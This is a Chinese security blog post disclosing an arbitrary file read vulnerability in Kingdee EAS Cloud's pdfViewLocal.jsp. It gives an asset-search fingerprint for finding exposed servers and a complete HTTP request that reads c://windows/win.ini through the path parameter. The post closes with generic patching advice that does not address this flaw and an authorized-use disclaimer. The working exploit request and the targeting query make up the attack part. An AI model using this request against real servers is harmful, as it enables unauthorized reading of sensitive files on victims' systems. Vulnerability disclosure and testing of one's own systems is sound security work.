X蝶EAS pdfviewlocal任意文件件读取漏洞

产品介绍

x蝶EAS Cloud为集团型企业提供功能全面、性能稳定、扩展性强的数字化平台，帮助企业链接外部产业链上下游，实现信息共享、风险共担，优化生态圈资源配置，构筑产业生态的护城河，同时打通企业内部价值链的数据链条，实现数据不落地，管理无断点，支撑“横向到边”财务业务的一体化协同和“纵向到底”集团战略的一体化管控，帮助企业强化核心竞争力。X蝶 EAS Cloud pdfViewLocal.jsp存在任意文件读取漏洞漏洞，攻击者可通过该漏洞在服务器端读取任意敏感文件。

资产测绘

app=“Kingdee-EAS”

漏洞复现

GET /plt_document/fragments/content/pdfViewLocal.jsp?path=c://windows/win.ini HTTP/1.1Host: your_ipCache-Control: max-age=0Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflate, brAccept-Language: zh-CN,zh;q=0.9Connection: close

读出c://windows/win.ini的内容

修复建议

   漏洞扫描的修复建议是针对扫描结果中发现的漏洞和安全弱点，提供相应的修复措施和建议。修复建议可以根据漏洞的类型和严重程度而有所不同，以下是一些常见的修复建议：

1. 及时安装补丁和更新：对于发现的已知漏洞，及时安装官方提供的补丁程序或更新，以修复已知漏洞。

2. 强化身份验证和访问控制：加强用户身份验证机制，推荐使用多因素身份验证。确保只有授权人员能够访问敏感数据和系统。

3. 加强密码策略：实施强密码策略，要求用户使用复杂、长且独特的密码，并定期更换密码。推荐使用密码管理工具来管理和生成密码。

4. 配置安全性设置：遵循最佳实践来配置操作系统、应用程序和网络设备的安全性设置。禁用不必要的服务和功能，限制对系统的远程访问等。

5. 加固网络防火墙设置：配置网络防火墙来限制对系统和服务的访问，只允许必要的流量通过，并根据需要设置入站和出站规则。

6. 确保及时备份和恢复：定期备份重要数据，并测试恢复过程，以确保数据安全性和完整性。

7. 加强应用程序安全：采用安全编码实践，在应用程序中强化输入验证、跨站点脚本（XSS）和跨站点请求伪造（CSRF）防护等。

8. 建立漏洞管理流程：建立漏洞管理的流程和责任制，确保发现的漏洞得到及时响应和处理。制定优先级和时间表，及时修复高风险漏洞。

需要针对具体的漏洞扫描结果和目标系统的情况，结合实际情况设计和实施修复措施。此外，建议进行定期的漏洞扫描和安全评估，以确保系统的持续安全性。对于复杂的或不确定的修复建议，建议寻求安全专家的帮助。

公众号技术文章仅供诸位网络安全工程师对自己所管辖的网站、服务器、网络进行检测或维护时参考用，公众号的检测工具仅供各大安全公司的安全测试员安全测试使用。未经允许请勿利用文章里的技术资料对任何外部计算机系统进行入侵攻击，公众号的各类工具均不得用于任何非授权形式的安全测试。公众号仅提供技术交流，不对任何成员利用技术文章或者检测工具造成任何理论上的或实际上的损失承担责任。
加微信进群获取更多资源：

原文始发于微信公众号（TKing的安全圈）：X蝶EAS pdfviewlocal任意文件件读取漏洞